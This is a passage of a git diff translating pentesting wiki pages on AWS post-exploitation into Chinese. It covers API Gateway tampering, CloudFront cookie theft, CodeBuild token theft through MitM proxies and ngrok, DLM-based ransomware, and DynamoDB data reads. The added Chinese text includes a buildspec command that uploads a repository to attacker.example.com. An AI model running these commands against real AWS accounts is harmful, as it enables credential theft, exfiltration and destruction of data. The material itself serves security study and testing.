的攻击者可以**修改现有API Gateway REST API方法的响应,以包含自定义头或响应模板,这些头或模板泄露敏感信息或执行恶意脚本**。 ```bash API_ID="your-api-id" RESOURCE_ID="your-resource-id" @@ -98,16 +89,14 @@ aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources. +**潜在影响**:敏感信息泄露、执行恶意脚本或未经授权访问API资源。 > [!NOTE] -> Need testing +> 需要测试 ### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment` -An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**. - +拥有权限 `apigateway:UpdateRestApi` 和 `apigateway:CreateDeployment` 的攻击者可以**修改API Gateway REST API设置以禁用日志记录或更改最低TLS版本,从而可能削弱API的安全性**。 ```bash API_ID="your-api-id" @@ -117,16 +106,14 @@ aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=repla # Create a deployment for the updated API Gateway REST API aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod ``` - -**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information. +**潜在影响**:削弱API的安全性,可能允许未经授权的访问或暴露敏感信息。 > [!NOTE] -> Need testing +> 需要测试 ### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey` -An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**. 
- +拥有权限 `apigateway:CreateApiKey`、`apigateway:UpdateApiKey`、`apigateway:CreateUsagePlan` 和 `apigateway:CreateUsagePlanKey` 的攻击者可以**创建新的API密钥,将其与使用计划关联,然后使用这些密钥未经授权访问API**。 ```bash # Create a new API key API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id') @@ -137,14 +124,9 @@ USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --outp # Associate the API key with the usage plan aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY ``` - -**Potential Impact**: Unauthorized access to API resources, bypassing security controls. +**潜在影响**:未经授权访问API资源,绕过安全控制。 > [!NOTE] -> Need testing +> 需要测试 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md index 4a3c4ff21..e415ff360 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md @@ -1,35 +1,31 @@ -# AWS - CloudFront Post Exploitation +# AWS - CloudFront 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## CloudFront -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-cloudfront-enum.md {{#endref}} -### Man-in-the-Middle +### 中间人攻击 -This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script). +这篇 [**博客文章**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) 提出了几种不同的场景,其中可以将 **Lambda** 添加(或在已使用的情况下进行修改)到 **通过 CloudFront 的通信中**,目的是 **窃取** 用户信息(如会话 **cookie**)并 **修改** **响应**(注入恶意 JS 脚本)。 -#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket +#### 场景 1:中间人攻击,其中 CloudFront 配置为访问某个存储桶的 HTML -- **Create** the malicious **function**. -- **Associate** it with the CloudFront distribution. -- Set the **event type to "Viewer Response"**. +- **创建** 恶意 **函数**。 +- **将其与 CloudFront 分发关联**。 +- 将 **事件类型设置为 "Viewer Response"**。 -Accessing the response you could steal the users cookie and inject a malicious JS. +访问响应后,您可以窃取用户的 cookie 并注入恶意 JS。 -#### scenario 2: MitM where CloudFront is already using a lambda function +#### 场景 2:中间人攻击,其中 CloudFront 已在使用 lambda 函数 -- **Modify the code** of the lambda function to steal sensitive information +- **修改 lambda 函数的代码** 以窃取敏感信息 -You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main). 
+您可以在这里查看 [**tf 代码以重现这些场景**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main)。 {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md index 54be4e299..204ffb1ec 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md @@ -1,88 +1,76 @@ -# AWS - CodeBuild Post Exploitation +# AWS - CodeBuild 后期利用 {{#include ../../../../banners/hacktricks-training.md}} ## CodeBuild -For more information, check: +有关更多信息,请查看: {{#ref}} ../../aws-services/aws-codebuild-enum.md {{#endref}} -### Check Secrets +### 检查秘密 -If credentials have been set in Codebuild to connect to Github, Gitlab or Bitbucket in the form of personal tokens, passwords or OAuth token access, these **credentials are going to be stored as secrets in the secret manager**.\ -Therefore, if you have access to read the secret manager you will be able to get these secrets and pivot to the connected platform. +如果在 Codebuild 中设置了凭据以连接到 Github、Gitlab 或 Bitbucket,形式为个人令牌、密码或 OAuth 令牌访问,这些 **凭据将作为秘密存储在秘密管理器中**。\ +因此,如果您有权限读取秘密管理器,您将能够获取这些秘密并转向连接的平台。 {{#ref}} ../../aws-privilege-escalation/aws-secrets-manager-privesc.md {{#endref}} -### Abuse CodeBuild Repo Access +### 滥用 CodeBuild 仓库访问 -In order to configure **CodeBuild**, it will need **access to the code repo** that it's going to be using. Several platforms could be hosting this code: +为了配置 **CodeBuild**,它需要 **访问将要使用的代码仓库**。多个平台可能托管此代码:
-The **CodeBuild project must have access** to the configured source provider, either via **IAM role** of with a github/bitbucket **token or OAuth access**.
+**CodeBuild 项目必须能够访问** 所配置的源代码提供商,访问方式可以是 **IAM 角色**,也可以是 github/bitbucket 的 **令牌或 OAuth 访问**。

-An attacker with **elevated permissions in over a CodeBuild** could abuse this configured access to leak the code of the configured repo and others where the set creds have access.\
-In order to do this, an attacker would just need to **change the repository URL to each repo the config credentials have access** (note that the aws web will list all of them for you):
+**对某个 CodeBuild 拥有提升权限的攻击者** 可以滥用这份已配置的访问权限,泄露所配置仓库以及该凭据有权访问的其他仓库的代码。\
+为了做到这一点,攻击者只需 **将仓库 URL 依次改为该凭据有权访问的每个仓库**(请注意,AWS 网页控制台会为您列出所有这些仓库),并如下文示例所示修改 buildspec 命令:

<div data-gb-custom-block data-tag="figure">
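作为示意,下面是一个假设性的命令草图,可放入恶意 buildspec 的 build 阶段,在构建时把克隆下来的仓库打包并外泄到攻击者控制的服务器(其中的域名仅为示例):
```bash
# CodeBuild 会把所配置的仓库克隆到 $CODEBUILD_SRC_DIR
tar czf /tmp/repo.tar.gz -C "$CODEBUILD_SRC_DIR" .

# 将打包后的代码发送到攻击者控制的服务器(URL 仅为示例)
curl -s -X POST --data-binary @/tmp/repo.tar.gz https://attacker.example.com/exfil
```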
-And **change the Buildspec commands to exfiltrate each repo**. +并且 **更改 Buildspec 命令以提取每个仓库**。 > [!WARNING] -> However, this **task is repetitive and tedious** and if a github token was configured with **write permissions**, an attacker **won't be able to (ab)use those permissions** as he doesn't have access to the token.\ -> Or does he? Check the next section +> 然而,这 **项任务是重复且乏味的**,如果配置了具有 **写权限** 的 github 令牌,攻击者 **将无法(滥)用这些权限**,因为他没有访问令牌。\ +> 或者他有吗?查看下一部分 -### Leaking Access Tokens from AWS CodeBuild - -You can leak access given in CodeBuild to platforms like Github. Check if any access to external platforms was given with: +### 从 AWS CodeBuild 泄露访问令牌 +您可以泄露在 CodeBuild 中授予的平台访问权限,例如 Github。检查是否授予了对外部平台的任何访问权限: ```bash aws codebuild list-source-credentials ``` - {{#ref}} aws-codebuild-token-leakage.md {{#endref}} ### `codebuild:DeleteProject` -An attacker could delete an entire CodeBuild project, causing loss of project configuration and impacting applications relying on the project. - +攻击者可以删除整个 CodeBuild 项目,导致项目配置丢失,并影响依赖该项目的应用程序。 ```bash aws codebuild delete-project --name ``` - -**Potential Impact**: Loss of project configuration and service disruption for applications using the deleted project. +**潜在影响**:项目配置丢失和使用已删除项目的应用程序服务中断。 ### `codebuild:TagResource` , `codebuild:UntagResource` -An attacker could add, modify, or remove tags from CodeBuild resources, disrupting your organization's cost allocation, resource tracking, and access control policies based on tags. - +攻击者可以添加、修改或删除CodeBuild资源的标签,从而干扰您组织基于标签的成本分配、资源跟踪和访问控制策略。 ```bash aws codebuild tag-resource --resource-arn --tags aws codebuild untag-resource --resource-arn --tag-keys ``` - -**Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +**潜在影响**:成本分配、资源跟踪和基于标签的访问控制策略的中断。 ### `codebuild:DeleteSourceCredentials` -An attacker could delete source credentials for a Git repository, impacting the normal functioning of applications relying on the repository. - +攻击者可以删除 Git 存储库的源凭证,影响依赖该存储库的应用程序的正常运行。 ```sql aws codebuild delete-source-credentials --arn ``` - -**Potential Impact**: Disruption of normal functioning for applications relying on the affected repository due to the removal of source credentials. 
+**潜在影响**:由于源凭证的删除,依赖受影响存储库的应用程序的正常功能受到干扰。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md index c514d7a7c..227cb4d8d 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/aws-codebuild-token-leakage.md @@ -2,73 +2,68 @@ {{#include ../../../../banners/hacktricks-training.md}} -## Recover Github/Bitbucket Configured Tokens - -First, check if there are any source credentials configured that you could leak: +## 恢复 Github/Bitbucket 配置的令牌 +首先,检查是否配置了任何源凭据,以便您可以泄露: ```bash aws codebuild list-source-credentials ``` +### 通过 Docker 镜像 -### Via Docker Image +如果你发现例如 Github 的认证已在账户中设置,你可以通过让 Codebuild **使用特定的 docker 镜像** 来运行项目的构建,从而 **提取** 该 **访问** (**GH token 或 OAuth token**)。 -If you find that authentication to for example Github is set in the account, you can **exfiltrate** that **access** (**GH token or OAuth token**) by making Codebuild to **use an specific docker image** to run the build of the project. +为此,你可以 **创建一个新的 Codebuild 项目** 或更改现有项目的 **环境** 以设置 **Docker 镜像**。 -For this purpose you could **create a new Codebuild project** or change the **environment** of an existing one to set the **Docker image**. +你可以使用的 Docker 镜像是 [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm)。这是一个非常基础的 Docker 镜像,将设置 **环境变量 `https_proxy`**、**`http_proxy`** 和 **`SSL_CERT_FILE`**。这将允许你拦截在 **`https_proxy`** 和 **`http_proxy`** 中指示的主机的大部分流量,并信任在 **`SSL_CERT_FILE`** 中指示的 SSL 证书。 -The Docker image you could use is [https://github.com/carlospolop/docker-mitm](https://github.com/carlospolop/docker-mitm). This is a very basic Docker image that will set the **env variables `https_proxy`**, **`http_proxy`** and **`SSL_CERT_FILE`**. This will allow you to intercept most of the traffic of the host indicated in **`https_proxy`** and **`http_proxy`** and trusting the SSL CERT indicated in **`SSL_CERT_FILE`**. - -1. **Create & Upload your own Docker MitM image** - - Follow the instructions of the repo to set your proxy IP address and set your SSL cert and **build the docker image**. - - **DO NOT SET `http_proxy`** to not intercept requests to the metadata endpoint. - - You could use **`ngrok`** like `ngrok tcp 4444` lo set the proxy to your host - - Once you have the Docker image built, **upload it to a public repo** (Dockerhub, ECR...) -2. **Set the environment** - - Create a **new Codebuild project** or **modify** the environment of an existing one. - - Set the project to use the **previously generated Docker image** +1. **创建并上传你自己的 Docker MitM 镜像** +- 按照仓库的说明设置你的代理 IP 地址并设置你的 SSL 证书,然后 **构建 docker 镜像**。 +- **不要设置 `http_proxy`** 以避免拦截对元数据端点的请求。 +- 你可以使用 **`ngrok`**,例如 `ngrok tcp 4444` 来将代理设置为你的主机。 +- 一旦你构建了 Docker 镜像,**将其上传到公共仓库**(Dockerhub, ECR...)。 +2. **设置环境** +- 创建一个 **新的 Codebuild 项目** 或 **修改** 现有项目的环境。 +- 设置项目使用 **之前生成的 Docker 镜像**。
-3. **Set the MitM proxy in your host** - -- As indicated in the **Github repo** you could use something like: +3. **在你的主机上设置 MitM 代理** +- 如 **Github 仓库** 中所示,你可以使用类似的东西: ```bash mitmproxy --listen-port 4444 --allow-hosts "github.com" ``` - > [!TIP] -> The **mitmproxy version used was 9.0.1**, it was reported that with version 10 this might not work. +> 使用的 **mitmproxy 版本是 9.0.1**,据报道在版本 10 中这可能无法工作。 -4. **Run the build & capture the credentials** +4. **运行构建并捕获凭证** -- You can see the token in the **Authorization** header: +- 您可以在 **Authorization** 头中看到令牌: -
- -This could also be done from the aws cli with something like +
+这也可以通过 aws cli 以类似的方式完成。 ```bash # Create project using a Github connection aws codebuild create-project --cli-input-json file:///tmp/buildspec.json ## With /tmp/buildspec.json { - "name": "my-demo-project", - "source": { - "type": "GITHUB", - "location": "https://github.com/uname/repo", - "buildspec": "buildspec.yml" - }, - "artifacts": { - "type": "NO_ARTIFACTS" - }, - "environment": { - "type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM - "image": "docker.io/carlospolop/docker-mitm:v12", - "computeType": "BUILD_GENERAL1_SMALL", - "imagePullCredentialsType": "CODEBUILD" - } +"name": "my-demo-project", +"source": { +"type": "GITHUB", +"location": "https://github.com/uname/repo", +"buildspec": "buildspec.yml" +}, +"artifacts": { +"type": "NO_ARTIFACTS" +}, +"environment": { +"type": "LINUX_CONTAINER", // Use "ARM_CONTAINER" to run docker-mitm ARM +"image": "docker.io/carlospolop/docker-mitm:v12", +"computeType": "BUILD_GENERAL1_SMALL", +"imagePullCredentialsType": "CODEBUILD" +} } ## Json @@ -76,117 +71,102 @@ aws codebuild create-project --cli-input-json file:///tmp/buildspec.json # Start the build aws codebuild start-build --project-name my-project2 ``` +### 通过 insecureSSL -### Via insecureSSL - -**Codebuild** projects have a setting called **`insecureSsl`** that is hidden in the web you can only change it from the API.\ -Enabling this, allows to Codebuild to connect to the repository **without checking the certificate** offered by the platform. - -- First you need to enumerate the current configuration with something like: +**Codebuild** 项目有一个名为 **`insecureSsl`** 的设置,该设置在网页中隐藏,您只能通过 API 更改它。\ +启用此选项后,Codebuild 可以连接到存储库 **而不检查** 平台提供的证书。 +- 首先,您需要使用类似以下的方式枚举当前配置: ```bash aws codebuild batch-get-projects --name ``` - -- Then, with the gathered info you can update the project setting **`insecureSsl`** to **`True`**. The following is an example of my updating a project, notice the **`insecureSsl=True`** at the end (this is the only thing you need to change from the gathered configuration). 
- - Moreover, add also the env variables **http_proxy** and **https_proxy** pointing to your tcp ngrok like: - +- 然后,使用收集到的信息,您可以将项目设置 **`insecureSsl`** 更新为 **`True`**。以下是我更新项目的示例,请注意最后的 **`insecureSsl=True`**(这是您需要从收集的配置中更改的唯一内容)。 +- 此外,还要添加环境变量 **http_proxy** 和 **https_proxy**,指向您的 tcp ngrok,如: ```bash aws codebuild update-project --name \ - --source '{ - "type": "GITHUB", - "location": "https://github.com/carlospolop/404checker", - "gitCloneDepth": 1, - "gitSubmodulesConfig": { - "fetchSubmodules": false - }, - "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", - "auth": { - "type": "CODECONNECTIONS", - "resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" - }, - "reportBuildStatus": false, - "insecureSsl": true - }' \ - --environment '{ - "type": "LINUX_CONTAINER", - "image": "aws/codebuild/standard:5.0", - "computeType": "BUILD_GENERAL1_SMALL", - "environmentVariables": [ - { - "name": "http_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - }, - { - "name": "https_proxy", - "value": "http://2.tcp.eu.ngrok.io:15027" - } - ] - }' +--source '{ +"type": "GITHUB", +"location": "https://github.com/carlospolop/404checker", +"gitCloneDepth": 1, +"gitSubmodulesConfig": { +"fetchSubmodules": false +}, +"buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - echo \"sad\"\n", +"auth": { +"type": "CODECONNECTIONS", +"resource": "arn:aws:codeconnections:eu-west-1:947247140022:connection/46cf78ac-7f60-4d7d-bf86-5011cfd3f4be" +}, +"reportBuildStatus": false, +"insecureSsl": true +}' \ +--environment '{ +"type": "LINUX_CONTAINER", +"image": "aws/codebuild/standard:5.0", +"computeType": "BUILD_GENERAL1_SMALL", +"environmentVariables": [ +{ +"name": "http_proxy", +"value": "http://2.tcp.eu.ngrok.io:15027" +}, +{ +"name": "https_proxy", +"value": "http://2.tcp.eu.ngrok.io:15027" +} +] +}' ``` - -- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy) - +- 然后,在代理变量指向的端口(http_proxy 和 https_proxy)运行 [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) 的基本示例 ```python from mitm import MITM, protocol, middleware, crypto mitm = MITM( - host="127.0.0.1", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() +host="127.0.0.1", +port=4444, +protocols=[protocol.HTTP], +middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. +certificate_authority = crypto.CertificateAuthority() ) mitm.run() ``` - -- Finally, click on **Build the project**, the **credentials** will be **sent in clear text** (base64) to the mitm port: +- 最后,点击 **Build the project**,**凭证**将以 **明文**(base64)发送到 mitm 端口:
-### ~~Via HTTP protocol~~ +### ~~通过 HTTP 协议~~ -> [!TIP] > **This vulnerability was corrected by AWS at some point the week of the 20th of Feb of 2023 (I think on Friday). So an attacker can't abuse it anymore :)** +> [!TIP] > **这个漏洞在 2023 年 2 月 20 日那周的某个时候被 AWS 修复了(我想是星期五)。所以攻击者不能再利用它了 :)** -An attacker with **elevated permissions in over a CodeBuild could leak the Github/Bitbucket token** configured or if permissions was configured via OAuth, the **temporary OAuth token used to access the code**. +具有 **提升权限的攻击者在 CodeBuild 中可能会泄露配置的 Github/Bitbucket 令牌**,或者如果权限是通过 OAuth 配置的,则 **用于访问代码的临时 OAuth 令牌**。 -- An attacker could add the environment variables **http_proxy** and **https_proxy** to the CodeBuild project pointing to his machine (for example `http://5.tcp.eu.ngrok.io:14972`). +- 攻击者可以将环境变量 **http_proxy** 和 **https_proxy** 添加到 CodeBuild 项目,指向他的机器(例如 `http://5.tcp.eu.ngrok.io:14972`)。
-- Then, change the URL of the github repo to use HTTP instead of HTTPS, for example: `http://github.com/carlospolop-forks/TestActions` -- Then, run the basic example from [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) in the port pointed by the proxy variables (http_proxy and https_proxy) - +- 然后,将 github 仓库的 URL 更改为使用 HTTP 而不是 HTTPS,例如:`http://github.com/carlospolop-forks/TestActions` +- 然后,在代理变量指向的端口(http_proxy 和 https_proxy)上运行来自 [https://github.com/synchronizing/mitm](https://github.com/synchronizing/mitm) 的基本示例。 ```python from mitm import MITM, protocol, middleware, crypto mitm = MITM( - host="0.0.0.0", - port=4444, - protocols=[protocol.HTTP], - middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. - certificate_authority = crypto.CertificateAuthority() +host="0.0.0.0", +port=4444, +protocols=[protocol.HTTP], +middlewares=[middleware.Log], # middleware.HTTPLog used for the example below. +certificate_authority = crypto.CertificateAuthority() ) mitm.run() ``` - -- Next, click on **Build the project** or start the build from command line: - +- 接下来,点击 **Build the project** 或从命令行启动构建: ```sh aws codebuild start-build --project-name ``` - -- Finally, the **credentials** will be **sent in clear text** (base64) to the mitm port: +- 最后,**凭证**将以**明文**(base64)发送到mitm端口:
> [!WARNING] -> Now an attacker will be able to use the token from his machine, list all the privileges it has and (ab)use easier than using the CodeBuild service directly. +> 现在攻击者将能够从他的机器上使用令牌,列出它拥有的所有权限,并比直接使用CodeBuild服务更容易地(滥用)它。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md index f1c6fb394..405179302 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-control-tower-post-exploitation.md @@ -8,17 +8,11 @@ ../aws-services/aws-security-and-detection-services/aws-control-tower-enum.md {{#endref}} -### Enable / Disable Controls - -To further exploit an account, you might need to disable/enable Control Tower controls: +### 启用 / 禁用控制 +为了进一步利用一个账户,您可能需要禁用/启用 Control Tower 控制: ```bash aws controltower disable-control --control-identifier --target-identifier aws controltower enable-control --control-identifier --target-identifier ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md index baa309e53..f1707135a 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dlm-post-exploitation.md @@ -1,99 +1,91 @@ -# AWS - DLM Post Exploitation +# AWS - DLM 后期利用 {{#include ../../../banners/hacktricks-training.md}} -## Data Lifecycle Manger (DLM) +## 数据生命周期管理器 (DLM) ### `EC2:DescribeVolumes`, `DLM:CreateLifeCyclePolicy` -A ransomware attack can be executed by encrypting as many EBS volumes as possible and then erasing the current EC2 instances, EBS volumes, and snapshots. To automate this malicious activity, one can employ Amazon DLM, encrypting the snapshots with a KMS key from another AWS account and transferring the encrypted snapshots to a different account. Alternatively, they might transfer snapshots without encryption to an account they manage and then encrypt them there. Although it's not straightforward to encrypt existing EBS volumes or snapshots directly, it's possible to do so by creating a new volume or snapshot. +勒索软件攻击可以通过加密尽可能多的 EBS 卷,然后删除当前的 EC2 实例、EBS 卷和快照来执行。为了自动化这一恶意活动,可以使用 Amazon DLM,使用来自另一个 AWS 账户的 KMS 密钥加密快照,并将加密的快照转移到不同的账户。或者,他们可能会将未加密的快照转移到他们管理的账户,然后在那里进行加密。尽管直接加密现有的 EBS 卷或快照并不简单,但可以通过创建新的卷或快照来实现。 -Firstly, one will use a command to gather information on volumes, such as instance ID, volume ID, encryption status, attachment status, and volume type. +首先,将使用一个命令收集卷的信息,例如实例 ID、卷 ID、加密状态、附加状态和卷类型。 `aws ec2 describe-volumes` -Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs. 
- +其次,将创建生命周期策略。此命令使用 DLM API 设置一个生命周期策略,该策略会在指定时间自动对指定卷进行每日快照。它还会将特定标签应用于快照,并将卷的标签复制到快照中。policyDetails.json 文件包含生命周期策略的具体信息,例如目标标签、计划、用于加密的可选 KMS 密钥的 ARN,以及快照共享的目标账户,这些信息将记录在受害者的 CloudTrail 日志中。 ```bash aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json ``` - -A template for the policy document can be seen here: - +可以在这里看到政策文档的模板: ```bash { - "PolicyType": "EBS_SNAPSHOT_MANAGEMENT", - "ResourceTypes": [ - "VOLUME" - ], - "TargetTags": [ - { - "Key": "ExampleKey", - "Value": "ExampleValue" - } - ], - "Schedules": [ - { - "Name": "DailySnapshots", - "CopyTags": true, - "TagsToAdd": [ - { - "Key": "SnapshotCreator", - "Value": "DLM" - } - ], - "VariableTags": [ - { - "Key": "CostCenter", - "Value": "Finance" - } - ], - "CreateRule": { - "Interval": 24, - "IntervalUnit": "HOURS", - "Times": [ - "03:00" - ] - }, - "RetainRule": { - "Count": 14 - }, - "FastRestoreRule": { - "Count": 2, - "Interval": 12, - "IntervalUnit": "HOURS" - }, - "CrossRegionCopyRules": [ - { - "TargetRegion": "us-west-2", - "Encrypted": true, - "CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id", - "CopyTags": true, - "RetainRule": { - "Interval": 1, - "IntervalUnit": "DAYS" - } - } - ], - "ShareRules": [ - { - "TargetAccounts": [ - "123456789012" - ], - "UnshareInterval": 30, - "UnshareIntervalUnit": "DAYS" - } - ] - } - ], - "Parameters": { - "ExcludeBootVolume": false - } +"PolicyType": "EBS_SNAPSHOT_MANAGEMENT", +"ResourceTypes": [ +"VOLUME" +], +"TargetTags": [ +{ +"Key": "ExampleKey", +"Value": "ExampleValue" +} +], +"Schedules": [ +{ +"Name": "DailySnapshots", +"CopyTags": true, +"TagsToAdd": [ +{ +"Key": "SnapshotCreator", +"Value": "DLM" +} +], +"VariableTags": [ +{ +"Key": "CostCenter", +"Value": "Finance" +} +], +"CreateRule": { +"Interval": 24, +"IntervalUnit": "HOURS", +"Times": [ +"03:00" +] +}, +"RetainRule": { +"Count": 14 +}, +"FastRestoreRule": { +"Count": 2, +"Interval": 12, +"IntervalUnit": "HOURS" +}, +"CrossRegionCopyRules": [ +{ +"TargetRegion": "us-west-2", +"Encrypted": true, +"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id", +"CopyTags": true, +"RetainRule": { +"Interval": 1, +"IntervalUnit": "DAYS" +} +} +], +"ShareRules": [ +{ +"TargetAccounts": [ +"123456789012" +], +"UnshareInterval": 30, +"UnshareIntervalUnit": "DAYS" +} +] +} +], +"Parameters": { +"ExcludeBootVolume": false +} } ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md index d63689d9e..7962b57ee 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-dynamodb-post-exploitation.md @@ -1,10 +1,10 @@ -# AWS - DynamoDB Post Exploitation +# AWS - DynamoDB 后期利用 {{#include ../../../banners/hacktricks-training.md}} ## DynamoDB -For more information check: +有关更多信息,请查看: {{#ref}} ../aws-services/aws-dynamodb-enum.md @@ -12,342 +12,292 @@ For more information check: ### `dynamodb:BatchGetItem` -An attacker with this permissions will be able to **get items from tables by the primary key** (you cannot just ask for all the data of the table). 
This means that you need to know the primary keys (you can get this by getting the table metadata (`describe-table`). +具有此权限的攻击者将能够 **通过主键从表中获取项目**(您不能仅请求表的所有数据)。这意味着您需要知道主键(您可以通过获取表元数据(`describe-table`)来获取此信息)。 {{#tabs }} {{#tab name="json file" }} - ```bash aws dynamodb batch-get-item --request-items file:///tmp/a.json // With a.json { - "ProductCatalog" : { // This is the table name - "Keys": [ - { - "Id" : { // Primary keys name - "N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those - } - } - ] - } +"ProductCatalog" : { // This is the table name +"Keys": [ +{ +"Id" : { // Primary keys name +"N": "205" // Value to search for, you could put here entries from 1 to 1000 to dump all those +} +} +] +} } ``` - {{#endtab }} {{#tab name="inline" }} - ```bash aws dynamodb batch-get-item \ - --request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \ - --region +--request-items '{"TargetTable": {"Keys": [{"Id": {"S": "item1"}}, {"Id": {"S": "item2"}}]}}' \ +--region ``` - {{#endtab }} {{#endtabs }} -**Potential Impact:** Indirect privesc by locating sensitive information in the table +**潜在影响:** 通过在表中定位敏感信息进行间接权限提升 ### `dynamodb:GetItem` -**Similar to the previous permissions** this one allows a potential attacker to read values from just 1 table given the primary key of the entry to retrieve: - +**与之前的权限类似,** 这允许潜在攻击者根据要检索的条目的主键从仅一个表中读取值: ```json aws dynamodb get-item --table-name ProductCatalog --key file:///tmp/a.json // With a.json { "Id" : { - "N": "205" +"N": "205" } } ``` - -With this permission it's also possible to use the **`transact-get-items`** method like: - +使用此权限,还可以使用 **`transact-get-items`** 方法,如下所示: ```json aws dynamodb transact-get-items \ - --transact-items file:///tmp/a.json +--transact-items file:///tmp/a.json // With a.json [ - { - "Get": { - "Key": { - "Id": {"N": "205"} - }, - "TableName": "ProductCatalog" - } - } +{ +"Get": { +"Key": { +"Id": {"N": "205"} +}, +"TableName": "ProductCatalog" +} +} ] ``` - -**Potential Impact:** Indirect privesc by locating sensitive 